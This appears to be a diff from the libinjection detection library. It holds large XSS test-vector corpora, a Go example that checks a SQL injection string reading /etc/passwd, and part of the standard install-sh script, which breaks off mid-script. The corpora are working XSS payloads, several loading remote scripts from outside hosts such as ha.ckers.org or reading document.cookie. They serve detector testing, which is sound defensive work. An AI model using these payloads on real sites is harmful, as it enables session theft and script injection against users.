<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
# Using ActionScript inside flash can obfuscate your XSS vector
# N/A
# XML data island with CDATA obfuscation
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# Locally hosted XML with embedded JavaScript that is generated using an XML data island
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
# XSS using HTML quote encapsulatio
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,86 @@
#
# Really simple XSS smoke test
#
#
# Script Tags
#
# in plain text context - duh
<script>alert(1);</script>
# as attribute <tag $USERINPUT></tag>
><script>alert(1);</script>
# as unquoted value <tag foo=$USERINPUT></tag>
x ><script>alert(1);</script>
# as single quoted value <tag foo='$USERINPUT'></tag>
' ><script>alert(1);</script>
# as double quoted value <tag foo="$USERINPUT"></tag>
"><script>alert(1);</script>
# inside <style>div:color=$USERINPUT;.. </style>
red;</style><script>alert(1);</script>
# inside <style>div { color=$USERINPUT;..} </style>
red;}</style><script>alert(1);</script>
# inside <div style="color:$USERINPUT"...
red;"/><script>alert(1);</script>
# inside CSS URL, e.g. background-image:url('$USERINPUT')
');}</style><script>alert(1);</script>
#
# onerror (or on-other)
#
# as attribute <tag $USERINPUT></tag>
onerror=alert(1)>
# as unquoted value <tag foo=$USERINPUT></tag>
x onerror=alert(1);>
# as single quoted value <tag foo='$USERINPUT'></tag>
x' onerror=alert(1);>
# as double quoted value <tag foo='$USERINPUT'></tag>
x" onerror=alert(1);>
#
# href-like
#
# duh
<a href="javascript:alert(1)">
<a href='javascript:alert(1)'>
<a href=javascript:alert(1)>
<a href = javascript:alert(1); >
<a href=" javascript:alert(1);" >
<a href="JAVASCRIPT:alert(1);" >
<a href="&#32;javascript:alert(1)" >
<a href="&#00032;javascript:alert(1)" >
<a href="&#x20;javascript:alert(1)" >
# does not work
#<a href="&nbsp;javascript:alert(1)" >
<a href="&#X20;javascript:alert(1)" >
<a href="&#74;avascript:alert(1)" >
<a href="&#000074;avascript:alert(1)" >
# really a raw embedded null
<a href="j&#0;avascript:alert(1)">

View file

@ -0,0 +1,105 @@
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
# http://pastebin.com/u6FY1xDA
# @soaj1664ashar
#
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
26) <img/src=@&#32;&#13; onerror = prompt('&#49;')
27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
30) &#00;</form><input type&#61;"date" onfocus="alert(1)">
31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
35) <script ~~~>alert(0%250)</script ~~~>
36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)
44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%25<!--'%25><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=&lt;!--&gt;&#10alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//&NewLine;confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:-)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
# unable to reproduce in IE8 or IE9
#92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript&colon;alert(1)>CLICKME
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

View file

@ -0,0 +1,57 @@
#
# Misc XSS awesomeness from soaj1664ashar feed
# https://twitter.com/soaj1664ashar
#
# https://twitter.com/soaj1664ashar/status/424961050258063360
# 2:46 AM - 20 Jan 2014
<iframe/onload=action=/confir/.source+'m';eval(action)(1)>
# https://twitter.com/soaj1664ashar/status/418454103895728128
# 3:50 AM - 2 Jan 2014
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
# https://twitter.com/soaj1664ashar/status/418163175788265472/
# 8:34 AM - 1 Jan 2014 :-)
><img src=http://i.imgur.com/ISxZ5dd.jpg onmouseover=confirm(/Happy_New_Year_2014/)>
# https://twitter.com/soaj1664ashar/status/416613093490163712
# Dec 28, 2013
# appears to be specific for a sanitization filter which alters the input
# into an XSS-able form.
#<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)> <button/type=submit>
# https://twitter.com/soaj1664ashar/status/407438076118462464
# 6:16 PM - 2 Dec 2013
<style/onload = !-alert&#x28;1&#x29;>
# https://twitter.com/soaj1664ashar/status/407086397493747712
# Dec 1, 2013
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
# https://twitter.com/soaj1664ashar/status/400335443805237248
# not sure who is author
# FF specific bug
# Nov 13, 2013
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+" style="FONT-SIZE: 1000pt; FONT-FAMILY: Comic Sans MS; position:absolute;top:0;left:0;width:1000;height:1000;opacity:0">ClickMe</a>
# https://twitter.com/soaj1664ashar/status/400257634449637376
<svg><;(noitacol)mrifnoc=daolno ;howthehellitworks`=wtf>`
# https://twitter.com/soaj1664ashar/status/400257634449637376
# http://jsfiddle.net/DH8wM/10/
<svg><GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
# https://twitter.com/soaj1664ashar/status/396307604734881792
"><img src=x onerror=confirm(1);>
#&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
# https://twitter.com/soaj1664ashar/status/385461391366168576
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
# https://twitter.com/soaj1664ashar/status/367350377894518784
# http://pastebin.com/TVH8t5bQ
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
# If a site has length restriction on input field then use chunk of your choice from the above vector :P

File diff suppressed because it is too large Load diff

33
libinjection/go/main.go Normal file
View file

@ -0,0 +1,33 @@
/*
* Copyright (c) 2013 Radolsaw Wesolowski
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
*/
package main
/*
#cgo CFLAGS: -I./libinjection
#cgo LDFLAGS: -L./libinjection -linjection
#include "libinjection.h"
#include "libinjection_sqli.h"
*/
import "C"
import (
"bytes"
"fmt"
"unsafe"
)
func main() {
sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
var out [8]C.char
pointer := (*C.char)(unsafe.Pointer(&out[0]))
if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 {
output := C.GoBytes(unsafe.Pointer(&out[0]), 8)
fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})]))
}
}

527
libinjection/install-sh Executable file
View file

@ -0,0 +1,527 @@
#!/bin/sh
# install - install a program, script, or datafile
scriptversion=2011-11-20.07; # UTC
# This originates from X11R5 (mit/util/scripts/install.sh), which was
# later released in X11R6 (xc/config/util/install.sh) with the
# following copyright and license.
#
# Copyright (C) 1994 X Consortium
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# X CONSORTIUM BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNEC-
# TION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Except as contained in this notice, the name of the X Consortium shall not
# be used in advertising or otherwise to promote the sale, use or other deal-
# ings in this Software without prior written authorization from the X Consor-
# tium.
#
#
# FSF changes to this file are in the public domain.
#
# Calling this script install-sh is preferred over install.sh, to prevent
# 'make' implicit rules from creating a file called install from it
# when there is no Makefile.
#
# This script is compatible with the BSD install script, but was written
# from scratch.
nl='
'
IFS=" "" $nl"
# set DOITPROG to echo to test this script
# Don't use :- since 4.3BSD and earlier shells don't like it.
doit=${DOITPROG-}
if test -z "$doit"; then
doit_exec=exec
else
doit_exec=$doit
fi
# Put in absolute file names if you don't have them in your path;
# or use environment vars.
chgrpprog=${CHGRPPROG-chgrp}
chmodprog=${CHMODPROG-chmod}
chownprog=${CHOWNPROG-chown}
cmpprog=${CMPPROG-cmp}
cpprog=${CPPROG-cp}
mkdirprog=${MKDIRPROG-mkdir}
mvprog=${MVPROG-mv}
rmprog=${RMPROG-rm}
stripprog=${STRIPPROG-strip}
posix_glob='?'
initialize_posix_glob='
test "$posix_glob" != "?" || {
if (set -f) 2>/dev/null; then
posix_glob=
else
posix_glob=:
fi
}
'
posix_mkdir=
# Desired mode of installed file.
mode=0755
chgrpcmd=
chmodcmd=$chmodprog
chowncmd=
mvcmd=$mvprog
rmcmd="$rmprog -f"
stripcmd=
src=
dst=
dir_arg=
dst_arg=
copy_on_change=false
no_target_directory=
usage="\
Usage: $0 [OPTION]... [-T] SRCFILE DSTFILE
or: $0 [OPTION]... SRCFILES... DIRECTORY
or: $0 [OPTION]... -t DIRECTORY SRCFILES...
or: $0 [OPTION]... -d DIRECTORIES...
In the 1st form, copy SRCFILE to DSTFILE.
In the 2nd and 3rd, copy all SRCFILES to DIRECTORY.
In the 4th, create DIRECTORIES.
Options:
--help display this help and exit.
--version display version info and exit.
-c (ignored)
-C install only if different (preserve the last data modification time)
-d create directories instead of installing files.
-g GROUP $chgrpprog installed files to GROUP.
-m MODE $chmodprog installed files to MODE.
-o USER $chownprog installed files to USER.
-s $stripprog installed files.
-t DIRECTORY install into DIRECTORY.
-T report an error if DSTFILE is a directory.
Environment variables override the default commands:
CHGRPPROG CHMODPROG CHOWNPROG CMPPROG CPPROG MKDIRPROG MVPROG
RMPROG STRIPPROG
"
while test $# -ne 0; do
case $1 in
-c) ;;
-C) copy_on_change=true;;
-d) dir_arg=true;;
-g) chgrpcmd="$chgrpprog $2"
shift;;
--help) echo "$usage"; exit $?;;
-m) mode=$2
case $mode in
*' '* | *' '* | *'
'* | *'*'* | *'?'* | *'['*)
echo "$0: invalid mode: $mode" >&2
exit 1;;
esac
shift;;
-o) chowncmd="$chownprog $2"
shift;;
-s) stripcmd=$stripprog;;
-t) dst_arg=$2
# Protect names problematic for 'test' and other utilities.
case $dst_arg in
-* | [=\(\)!]) dst_arg=./$dst_arg;;
esac
shift;;
-T) no_target_directory=true;;
--version) echo "$0 $scriptversion"; exit $?;;
--) shift
break;;
-*) echo "$0: invalid option: $1" >&2
exit 1;;
*) break;;
esac
shift
done
if test $# -ne 0 && test -z "$dir_arg$dst_arg"; then
# When -d is used, all remaining arguments are directories to create.
# When -t is used, the destination is already specified.
# Otherwise, the last argument is the destination. Remove it from $@.
for arg
do
if test -n "$dst_arg"; then
# $@ is not empty: it contains at least $arg.
set fnord "$@" "$dst_arg"
shift # fnord
fi
shift # arg
dst_arg=$arg
# Protect names problematic for 'test' and other utilities.
case $dst_arg in
-* | [=\(\)!]) dst_arg=./$dst_arg;;
esac
done
fi
if test $# -eq 0; then
if test -z "$dir_arg"; then
echo "$0: no input file specified." >&2
exit 1
fi
# It's OK to call 'install-sh -d' without argument.
# This can happen when creating conditional directories.
exit 0
fi
if test -z "$dir_arg"; then
do_exit='(exit $ret); exit $ret'
trap "ret=129; $do_exit" 1
trap "ret=130; $do_exit" 2
trap "ret=141; $do_exit" 13
trap "ret=143; $do_exit" 15
# Set umask so as not to create temps with too-generous modes.
# However, 'strip' requires both read and write access to temps.
case $mode in
# Optimize common cases.
*644) cp_umask=133;;
*755) cp_umask=22;;
*[0-7])
if test -z "$stripcmd"; then
u_plus_rw=
else
u_plus_rw='% 200'
fi
cp_umask=`expr '(' 777 - $mode % 1000 ')' $u_plus_rw`;;
*)
if test -z "$stripcmd"; then
u_plus_rw=
else
u_plus_rw=,u+rw
fi
cp_umask=$mode$u_plus_rw;;
esac
fi
for src
do
# Protect names problematic for 'test' and other utilities.
case $src in
-* | [=\(\)!]) src=./$src;;
esac
if test -n "$dir_arg"; then
dst=$src
dstdir=$dst
test -d "$dstdir"
dstdir_status=$?
else
# Waiting for this to be detected by the "$cpprog $src $dsttmp" command
# might cause directories to be created, which would be especially bad
# if $src (and thus $dsttmp) contains '*'.
if test ! -f "$src" && test ! -d "$src"; then
echo "$0: $src does not exist." >&2
exit 1
fi
if test -z "$dst_arg"; then
echo "$0: no destination specified." >&2
exit 1
fi
dst=$dst_arg
# If destination is a directory, append the input filename; won't work
# if double slashes aren't ignored.
if test -d "$dst"; then
if test -n "$no_target_directory"; then
echo "$0: $dst_arg: Is a directory" >&2
exit 1
fi
dstdir=$dst
dst=$dstdir/`basename "$src"`
dstdir_status=0
else
# Prefer dirname, but fall back on a substitute if dirname fails.
dstdir=`
(dirname "$dst") 2>/dev/null ||
expr X"$dst" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \
X"$dst" : 'X\(//\)[^/]' \| \
X"$dst" : 'X\(//\)$' \| \
X"$dst" : 'X\(/\)' \| . 2>/dev/null ||
echo X"$dst" |
sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{
s//\1/
q
}
/^X\(\/\/\)[^/].*/{
s//\1/
q
}
/^X\(\/\/\)$/{
s//\1/
q
}
/^X\(\/\).*/{
s//\1/
q
}
s/.*/./; q'
`
test -d "$dstdir"
dstdir_status=$?
fi
fi
obsolete_mkdir_used=false
if test $dstdir_status != 0; then
case $posix_mkdir in
'')
# Create intermediate dirs using mode 755 as modified by the umask.
# This is like FreeBSD 'install' as of 1997-10-28.
umask=`umask`
case $stripcmd.$umask in
# Optimize common cases.
*[2367][2367]) mkdir_umask=$umask;;
.*0[02][02] | .[02][02] | .[02]) mkdir_umask=22;;
*[0-7])
mkdir_umask=`expr $umask + 22 \
- $umask % 100 % 40 + $umask % 20 \
- $umask % 10 % 4 + $umask % 2
`;;
*) mkdir_umask=$umask,go-w;;
esac
# With -d, create the new directory with the user-specified mode.
# Otherwise, rely on $mkdir_umask.
if test -n "$dir_arg"; then
mkdir_mode=-m$mode
else
mkdir_mode=
fi
posix_mkdir=false
case $umask in
*[123567][0-7][0-7])
# POSIX mkdir -p sets u+wx bits regardless of umask, which
# is incompatible with FreeBSD 'install' when (umask & 300) != 0.
;;
*)
tmpdir=${TMPDIR-/tmp}/ins$RANDOM-$$
trap 'ret=$?; rmdir "$tmpdir/d" "$tmpdir" 2>/dev/null; exit $ret' 0
if (umask $mkdir_umask &&
exec $mkdirprog $mkdir_mode -p -- "$tmpdir/d") >/dev/null 2>&1
then
if test -z "$dir_arg" || {
# Check for POSIX incompatibilities with -m.
# HP-UX 11.23 and IRIX 6.5 mkdir -m -p sets group- or
# other-writable bit of parent directory when it shouldn't.
# FreeBSD 6.1 mkdir -m -p sets mode of existing directory.
ls_ld_tmpdir=`ls -ld "$tmpdir"`
case $ls_ld_tmpdir in
d????-?r-*) different_mode=700;;
d????-?--*) different_mode=755;;
*) false;;
esac &&
$mkdirprog -m$different_mode -p -- "$tmpdir" && {
ls_ld_tmpdir_1=`ls -ld "$tmpdir"`
test "$ls_ld_tmpdir" = "$ls_ld_tmpdir_1"
}
}
then posix_mkdir=:
fi
rmdir "$tmpdir/d" "$tmpdir"
else
# Remove any dirs left behind by ancient mkdir implementations.
rmdir ./$mkdir_mode ./-p ./-- 2>/dev/null
fi
trap '' 0;;
esac;;
esac
if
$posix_mkdir && (
umask $mkdir_umask &&
$doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir"
)
then :
else
# The umask is ridiculous, or mkdir does not conform to POSIX,
# or it failed possibly due to a race condition. Create the
# directory the slow way, step by step, checking for races as we go.
case $dstdir in
/*) prefix='/';;
[-=\(\)!]*) prefix='./';;
*) prefix='';;
esac
eval "$initialize_posix_glob"
oIFS=$IFS
IFS=/
$posix_glob set -f
set fnord $dstdir
shift
$posix_glob set +f
IFS=$oIFS
prefixes=
for d
do
test X"$d" = X && continue
prefix=$prefix$d
if test -d "$prefix"; then
prefixes=
else
if $posix_mkdir; then
(umask=$mkdir_umask &&
$doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir") && break
# Don't fail if two instances are running concurrently.
test -d "$prefix" || exit 1
else
case $prefix in
*\'*) qprefix=`echo "$prefix" | sed "s/'/'\\\\\\\\''/g"`;;
*) qprefix=$prefix;;
esac
prefixes="$prefixes '$qprefix'"
fi
fi
prefix=$prefix/
done
if test -n "$prefixes"; then
# Don't fail if two instances are running concurrently.
(umask $mkdir_umask &&
eval "\$doit_exec \$mkdirprog $prefixes") ||
test -d "$dstdir" || exit 1
obsolete_mkdir_used=true
fi
fi
fi
if test -n "$dir_arg"; then
{ test -z "$chowncmd" || $doit $chowncmd "$dst"; } &&
{ test -z "$chgrpcmd" || $doit $chgrpcmd "$dst"; } &&
{ test "$obsolete_mkdir_used$chowncmd$chgrpcmd" = false ||
test -z "$chmodcmd" || $doit $chmodcmd $mode "$dst"; } || exit 1
else
# Make a couple of temp file names in the proper directory.
dsttmp=$dstdir/_inst.$$_
rmtmp=$dstdir/_rm.$$_
# Trap to clean up those temp files at exit.
trap 'ret=$?; rm -f "$dsttmp" "$rmtmp" && exit $ret' 0
# Copy the file name to the temp name.
(umask $cp_umask && $doit_exec $cpprog "$src" "$dsttmp") &&
# and set any options; do chmod last to preserve setuid bits.
#
# If any of these fail, we abort the whole thing. If we want to
# ignore errors from any of these, just make sure not to ignore
# errors from the above "$doit $cpprog $src $dsttmp" command.
#
{ test -z "$chowncmd" || $doit $chowncmd "$dsttmp"; } &&
{ test -z "$chgrpcmd" || $doit $chgrpcmd "$dsttmp"; } &&
{ test -z "$stripcmd" || $doit $stripcmd "$dsttmp"; } &&
{ test -z "$chmodcmd" || $doit $chmodcmd $mode "$dsttmp"; } &&
# If -C, don't bother to copy if it wouldn't change the file.
if $copy_on_change &&
old=`LC_ALL=C ls -dlL "$dst" 2>/dev/null` &&
new=`LC_ALL=C ls -dlL "$dsttmp" 2>/dev/null` &&
eval "$initialize_posix_glob" &&
$posix_glob set -f &&
set X $old && old=:$2:$4:$5:$6 &&
set X $new && new=:$2:$4:$5:$6 &&
$posix_glob set +f &&
test "$old" = "$new" &&
$cmpprog "$dst" "$dsttmp" >/dev/null 2>&1
then
rm -f "$dsttmp"
else
# Rename the file to the real destination.
$doit $mvcmd -f "$dsttmp" "$dst" 2>/dev/null ||
# The rename failed, perhaps because mv can't rename something else
# to itself, or perhaps because mv is so ancient that it does not
# support -f.
{
# Now remove or move aside any old file at destination location.
# We try this two ways since rm can't unlink itself on some
# systems and the destination file might be busy for other
# reasons. In this case, the final cleanup might fail but the new
# file should still install successfully.
{
test ! -f "$dst" ||
